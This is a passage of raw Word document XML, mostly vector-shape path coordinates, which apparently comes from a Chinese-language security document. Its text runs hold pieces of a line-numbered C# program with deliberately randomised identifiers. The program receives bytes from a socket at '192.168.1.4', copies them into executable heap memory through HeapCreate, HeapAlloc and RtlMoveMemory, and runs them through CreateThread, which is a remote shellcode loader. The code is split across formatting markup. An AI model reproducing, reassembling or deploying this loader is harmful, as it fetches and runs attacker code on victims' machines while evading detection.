4346,8048,4346,8047,4346,8046,4346,8044,4346,8043,4346,8041,4346,8040,4346,8039,4346,8037,4346,8035,4346,8034,4346,8032,4346,8030,4346,8028,4346,8026,4346,8025,4346,8023,4346,8020,4346,8018,4346,8016,4346,8014,4346,8012,4346,8009,4346,8007,4346,8004,4346,8002,4346,7999,4346,7996,4346,7993,4346,7991,4346,7988,4346,7985,4346,7981,4346,7978,4346,7975,4346,7972,4346,7968,4346,7965,4346,7961,4346,7958,4346,7954,4346,7950,4346,7946,4346,7942,4346,7938,4346,7934,4346,7930,4346,7926,4346,7921,4346,7917,4346,7912,4346,7907,4346,7903,4346,7898,4346,7893,4346,7888,4346,7883,4346,7877,4346,7872,4346,7867,4346,7861,4346,7855,4346,7850,4346,7844,4346,7838,4346,7832,4346,7826,4346,7819,4346,7813e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:240.500pt;margin-top:475.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4810,9510" coordsize="130,250">
        <v:shape style="position:absolute;left:4810;top:9510;width:130;height:250" coordorigin="4810,9510" coordsize="130,250" path="m4826,9524l4826,9524,4826,9524,4826,9524,4826,9524,4826,9524,4826,9524,4826,9524,4826,9524,4826,9524,4826,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4827,9524,4828,9524,4828,9524,4828,9524,4828,9524,4828,9524,4828,9524,4829,9524,4829,9524,4829,9524,4829,9524,4829,9524,4830,9524,4830,9524,4830,9524,4831,9524,4831,9524,4831,9524,4832,9524,4832,9524,4833,9524,4833,9524,4833,9524,4834,9524,4834,9524,4835,9524,4835,9524,4836,9524,4836,9524,4837,9524,4838,9524,4838,9524,4839,9524,4840,9524,4840,9524,4841,9524,4842,9524,4843,9524,4843,9524,4844,9524,4845,9524,4846,9524,4847,9524,4848,9524,4849,9524,4850,9524,4851,9524,4852,9524,4853,9524,4854,9524,4855,9524,4856,9524,4858,9524,4859,9524,4860,9524,4862,9524,4863,9524,4864,9524,4866,9524,4867,9524,4869,9524,4870,9524,4872,9524,4873,9524,4875,9524,4877,9524,4878,9524,4880,9524,4882,9524,4884,9524,4886,9524,4888,9524,4889,9524,4891,9524,4893,9524,4896,9524,4898,9524,4900,9524,4902,9524,4904,9524,4907,9524,4909,9524,4911,9524,4914,9524,4916,9524,4919,9524,4921,9524,4924,9524,4927,9524,4929,9524,4932,9524,4935,9524,4938,9524,4941,9524,4943,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9524,4946,9525,4946,9525,4946,9525,4946,9525,4946,9525,4946,9525,4946,9526,4946,9526,4946,9526,4946,9526,4946,9527,4946,9527,4946,9527,4946,9528,4946,9528,4946,9529,4946,9529,4946,9530,4946,9530,4946,9531,4946,9531,4946,9532,4946,9533,4946,9533,4946,9534,4946,9535,4946,9536,4946,9537,4946,9538,4946,9539,4946,9540,4946,9541,4946,9542,4946,9543,4946,9544,4946,9545,4946,9546,4946,9548,4946,9549,4946,9550,4946,9552,4946,9553,4946,9555,4946,9557,4946,9558,4946,9560,4946,9562,4946,9563,4946,9565,4946,9567,4946,9569,4946,9571,4946,9574,4946,9576,4946,9578,4946,9580,4946,9583,4946,9585,4946,9588,4946,9590,4946,9593,4946,9596,4946,9598,4946,9601,4946,9604,4946,9607,4946,9610,4946,9614,4946,9617,4946,9620,4946,9623,4946,9627,4946,9631,4946,9634,4946,9638,4946,9642,4946,9646,4946,9650,4946,9654,4946,9658,4946,9662,4946,9666,4946,9671,4946,9675,4946,9680,4946,9684,4946,9689,4946,9694,4946,9699,4946,9704,4946,9709,4946,9715,4946,9720,4946,9725,4946,9731,4946,9737,4946,9742,4946,9748,4946,9754,4946,9760,4946,9766,4946,9773,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4946,9779,4945,9779,4945,9779,4945,9779,4945,9779,4945,9779,4945,9779,4944,9779,4944,9779,4944,9779,4944,9779,4943,9779,4943,9779,4943,9779,4943,9779,4942,9779,4942,9779,4942,9779,4941,9779,4941,9779,4940,9779,4940,9779,4940,9779,4939,9779,4939,9779,4938,9779,4938,9779,4937,9779,4936,9779,4936,9779,4935,9779,4935,9779,4934,9779,4933,9779,4933,9779,4932,9779,4931,9779,4930,9779,4930,9779,4929,9779,4928,9779,4927,9779,4926,9779,4925,9779,4924,9779,4923,9779,4922,9779,4921,9779,4920,9779,4919,9779,4918,9779,4916,9779,4915,9779,4914,9779,4913,9779,4911,9779,4910,9779,4909,9779,4907,9779,4906,9779,4904,9779,4903,9779,4901,9779,4900,9779,4898,9779,4896,9779,4895,9779,4893,9779,4891,9779,4889,9779,4887,9779,4885,9779,4883,9779,4881,9779,4879,9779,4877,9779,4875,9779,4873,9779,4871,9779,4869,9779,4866,9779,4864,9779,4862,9779,4859,9779,4857,9779,4854,9779,4852,9779,4849,9779,4846,9779,4844,9779,4841,9779,4838,9779,4835,9779,4832,9779,4829,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9779,4826,9778,4826,9778,4826,9778,4826,9778,4826,9778,4826,9778,4826,9778,4826,9777,4826,9777,4826,9777,4826,9777,4826,9776,4826,9776,4826,9776,4826,9775,4826,9775,4826,9774,4826,9774,4826,9773,4826,9773,4826,9772,4826,9772,4826,9771,4826,9771,4826,9770,4826,9769,4826,9768,4826,9768,4826,9767,4826,9766,4826,9765,4826,9764,4826,9763,4826,9762,4826,9761,4826,9760,4826,9759,4826,9758,4826,9756,4826,9755,4826,9754,4826,9752,4826,9751,4826,9749,4826,9748,4826,9746,4826,9745,4826,9743,4826,9741,4826,9739,4826,9737,4826,9735,4826,9733,4826,9731,4826,9729,4826,9727,4826,9725,4826,9722,4826,9720,4826,9718,4826,9715,4826,9712,4826,9710,4826,9707,4826,9704,4826,9701,4826,9698,4826,9695,4826,9692,4826,9689,4826,9686,4826,9683,4826,9679,4826,9676,4826,9672,4826,9669,4826,9665,4826,9661,4826,9657,4826,9653,4826,9649,4826,9645,4826,9641,4826,9636,4826,9632,4826,9628,4826,9623,4826,9618,4826,9613,4826,9609,4826,9604,4826,9599,4826,9593,4826,9588,4826,9583,4826,9577,4826,9572,4826,9566,4826,9560,4826,9555,4826,9549,4826,9543,4826,9536,4826,9530,4826,9524e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:378.500pt;margin-top:475.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7570,9510" coordsize="130,250">
        <v:shape style="position:absolute;left:7570;top:9510;width:130;height:250" coordorigin="7570,9510" coordsize="130,250" path="m7588,9524l7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7588,9524,7589,9524,7589,9524,7589,9524,7589,9524,7589,9524,7589,9524,7589,9524,7590,9524,7590,9524,7590,9524,7590,9524,7590,9524,7591,9524,7591,9524,7591,9524,7591,9524,7592,9524,7592,9524,7592,9524,7593,9524,7593,9524,7593,9524,7594,9524,7594,9524,7595,9524,7595,9524,7596,9524,7596,9524,7597,9524,7597,9524,7598,9524,7598,9524,7599,9524,7600,9524,7600,9524,7601,9524,7602,9524,7602,9524,7603,9524,7604,9524,7605,9524,7606,9524,7606,9524,7607,9524,7608,9524,7609,9524,7610,9524,7611,9524,7612,9524,7613,9524,7614,9524,7616,9524,7617,9524,7618,9524,7619,9524,7620,9524,7622,9524,7623,9524,7624,9524,7626,9524,7627,9524,7629,9524,7630,9524,7632,9524,7633,9524,7635,9524,7636,9524,7638,9524,7640,9524,7642,9524,7643,9524,7645,9524,7647,9524,7649,9524,7651,9524,7653,9524,7655,9524,7657,9524,7659,9524,7661,9524,7663,9524,7666,9524,7668,9524,7670,9524,7673,9524,7675,9524,7678,9524,7680,9524,7683,9524,7685,9524,7688,9524,7691,9524,7693,9524,7696,9524,7699,9524,7702,9524,7705,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9524,7708,9525,7708,9525,7708,9525,7708,9525,7708,9525,7708,9525,7708,9526,7708,9526,7708,9526,7708,9526,7708,9527,7708,9527,7708,9527,7708,9528,7708,9528,7708,9529,7708,9529,7708,9530,7708,9530,7708,9531,7708,9531,7708,9532,7708,9533,7708,9533,7708,9534,7708,9535,7708,9536,7708,9537,7708,9538,7708,9539,7708,9540,7708,9541,7708,9542,7708,9543,7708,9544,7708,9545,7708,9546,7708,9548,7708,9549,7708,9550,7708,9552,7708,9553,7708,9555,7708,9557,7708,9558,7708,9560,7708,9562,7708,9563,7708,9565,7708,9567,7708,9569,7708,9571,7708,9574,7708,9576,7708,9578,7708,9580,7708,9583,7708,9585,7708,9588,7708,9590,7708,9593,7708,9596,7708,9598,7708,9601,7708,9604,7708,9607,7708,9610,7708,9614,7708,9617,7708,9620,7708,9623,7708,9627,7708,9631,7708,9634,7708,9638,7708,9642,7708,9646,7708,9650,7708,9654,7708,9658,7708,9662,7708,9666,7708,9671,7708,9675,7708,9680,7708,9684,7708,9689,7708,9694,7708,9699,7708,9704,7708,9709,7708,9715,7708,9720,7708,9725,7708,9731,7708,9737,7708,9742,7708,9748,7708,9754,7708,9760,7708,9766,7708,9773,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7708,9779,7707,9779,7707,9779,7707,9779,7707,9779,7707,9779,7707,9779,7707,9779,7707,9779,7707,9779,7706,9779,7706,9779,7706,9779,7706,9779,7706,9779,7706,9779,7705,9779,7705,9779,7705,9779,7705,9779,7704,9779,7704,9779,7704,9779,7703,9779,7703,9779,7703,9779,7702,9779,7702,9779,7701,9779,7701,9779,7700,9779,7700,9779,7700,9779,7699,9779,7698,9779,7698,9779,7697,9779,7697,9779,7696,9779,7695,9779,7695,9779,7694,9779,7693,9779,7692,9779,7692,9779,7691,9779,7690,9779,7689,9779,7688,9779,7687,9779,7686,9779,7685,9779,7684,9779,7683,9779,7682,9779,7681,9779,7680,9779,7679,9779,7678,9779,7677,9779,7675,9779,7674,9779,7673,9779,7671,9779,7670,9779,7669,9779,7667,9779,7666,9779,7664,9779,7663,9779,7661,9779,7659,9779,7658,9779,7656,9779,7654,9779,7652,9779,7651,9779,7649,9779,7647,9779,7645,9779,7643,9779,7641,9779,7639,9779,7637,9779,7634,9779,7632,9779,7630,9779,7628,9779,7625,9779,7623,9779,7621,9779,7618,9779,7616,9779,7613,9779,7610,9779,7608,9779,7605,9779,7602,9779,7600,9779,7597,9779,7594,9779,7591,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9779,7588,9778,7588,9778,7588,9778,7588,9778,7588,9778,7588,9778,7588,9778,7588,9777,7588,9777,7588,9777,7588,9777,7588,9776,7588,9776,7588,9776,7588,9775,7588,9775,7588,9774,7588,9774,7588,9773,7588,9773,7588,9772,7588,9772,7588,9771,7588,9771,7588,9770,7588,9769,7588,9768,7588,9768,7588,9767,7588,9766,7588,9765,7588,9764,7588,9763,7588,9762,7588,9761,7588,9760,7588,9759,7588,9758,7588,9756,7588,9755,7588,9754,7588,9752,7588,9751,7588,9749,7588,9748,7588,9746,7588,9745,7588,9743,7588,9741,7588,9739,7588,9737,7588,9735,7588,9733,7588,9731,7588,9729,7588,9727,7588,9725,7588,9722,7588,9720,7588,9718,7588,9715,7588,9712,7588,9710,7588,9707,7588,9704,7588,9701,7588,9698,7588,9695,7588,9692,7588,9689,7588,9686,7588,9683,7588,9679,7588,9676,7588,9672,7588,9669,7588,9665,7588,9661,7588,9657,7588,9653,7588,9649,7588,9645,7588,9641,7588,9636,7588,9632,7588,9628,7588,9623,7588,9618,7588,9613,7588,9609,7588,9604,7588,9599,7588,9593,7588,9588,7588,9583,7588,9577,7588,9572,7588,9566,7588,9560,7588,9555,7588,9549,7588,9543,7588,9536,7588,9530,7588,9524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33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int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IETFBI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BitConverter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ToInt32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Bjpvhc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34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ZKSAAFwxgSDnTW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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IETFBI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35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="14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int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JFPJLlk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="19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36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while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JFPJLlk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IETFBI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37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{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JFPJLlk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+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MXCEuiuRIWgOYze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Receive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ZKSAAFwxgSDnTW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JFPJLlk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TFBI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JFPJLlk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4096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?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IETFBI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JFPJLlk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4096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38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nXRztzNVwPavq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BitConverter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GetBytes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int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MXCEuiuRIWgOYze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Han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dle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;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39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Array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Copy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nXRztzNVwPavq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ZKSAAFwxgSDnTW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ZKSAAFwxgSDnTW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[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96c38"/>
          <w:spacing w:val="2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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0xBF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;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40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return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ZKSAAFwxgSDnTW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;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}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void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TOdKEwPYRUgJly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KNCtlJWAmlqJ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{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42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if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KNCtlJWAmlqJ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!=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null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43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uuKxFZFwog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HeapCreate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0x00040000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KNCtlJWAmlqJ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Lengt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h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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2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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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44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sDPjIMhJIOAlwn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17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HeapAlloc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uuKxFZFwog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0x00000008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KNC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tlJWAmlqJ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Length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45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RtlMoveMemory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sDPjIMhJIOAlwn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KNCtlJWAmlqJ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UInt32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KNCtlJWAmlqJ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Leng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th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;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46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UInt32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ijifOEfllRl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57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47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IntPtr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ihXuoEirmz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CreateThread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sDPjIMhJIOAlwn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IntPtr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Zero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ref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ijifOEfllRl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56" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="410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48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WaitForSingleObject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ihXuoEirmz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0xFFFFFFFF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}}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49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50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public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static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void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QYJOTklTwn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{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51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byte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ZKSAAFwxgSDnTW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null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ZKSAAFwxgSDnTW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1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HMSjEXjuIzkkmo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"192.16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="0" w:firstLine="0"/>
      </w:pP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8.1.4"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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53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52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TOdKEwPYRUgJly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ZKSAAFwxgSDnTW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53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8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0" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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